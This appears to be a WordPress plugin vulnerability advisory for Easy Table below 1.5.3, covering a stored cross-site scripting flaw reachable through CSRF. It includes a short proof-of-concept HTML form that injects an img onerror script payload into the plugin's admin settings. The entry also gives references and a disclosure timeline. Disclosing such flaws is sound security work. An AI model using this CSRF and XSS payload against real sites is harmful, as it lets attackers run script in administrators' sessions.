Easy Table < 1.5.3 – Stored Cross-Site Scripting via CSRF | Plugin Vulnerabilities

Description

The plugin does not have CSRF check in place when updating the easy-table-test-area parameter, and is also lacking sanitisation as well as escaping, which could allow attackers to make a logged in admin change perform Stored XSS via a CSRF attack.

Proof of Concept

<html>
<form method="POST" action="https://localhost/wp-admin/options-general.php?page=easy-table&gexttab=1">
<input type="text" name="test-easy-table" value="1" />
<input type="text" name="easy-table-test-area" value='"><img src=x onerror=alert(/XSS/) />'>
<input type="submit">
</html>

Affects Plugins

Fixed in 1.5.3

References

URL

http://cinu.pl/research/wp-plugins/mail_9e1ba3ea7f72e1207c18dfebc290d6fd.html

URL

http://blog.cinu.pl/2015/11/php-static-code-analysis-vs-top-1000-wordpress-plugins.html

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Marcin Probola

Submitter

ethicalhack3r

Submitter twitter

Verified

Yes

WPVDB ID

58613d1c-081c-4e87-94ec-025880fc5660

Timeline

Publicly Published

2015-08-10 (about 10 years ago)

Added

2015-11-22 (about 10 years ago)

Last Updated

2022-06-29 (about 3 years ago)

Other

Published

Title

Published

2024-10-15

Title

Appointment Booking Calendar < 1.6.7.55 - Admin+ Stored XSS

Published

2025-03-27

Title

The Ultimate WordPress Toolkit – WP Extended < 3.0.15 - Reflected Cross-Site Scripting

Published

2025-04-01

Title

mFolio Lite <= 1.2.3 - Contributor+ Stored XSS

Published

2025-07-07

Title

WoodMart < 8.2.4 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2024-11-20

Title

Page Parts < 1.4.4 - Reflected Cross-Site Scripting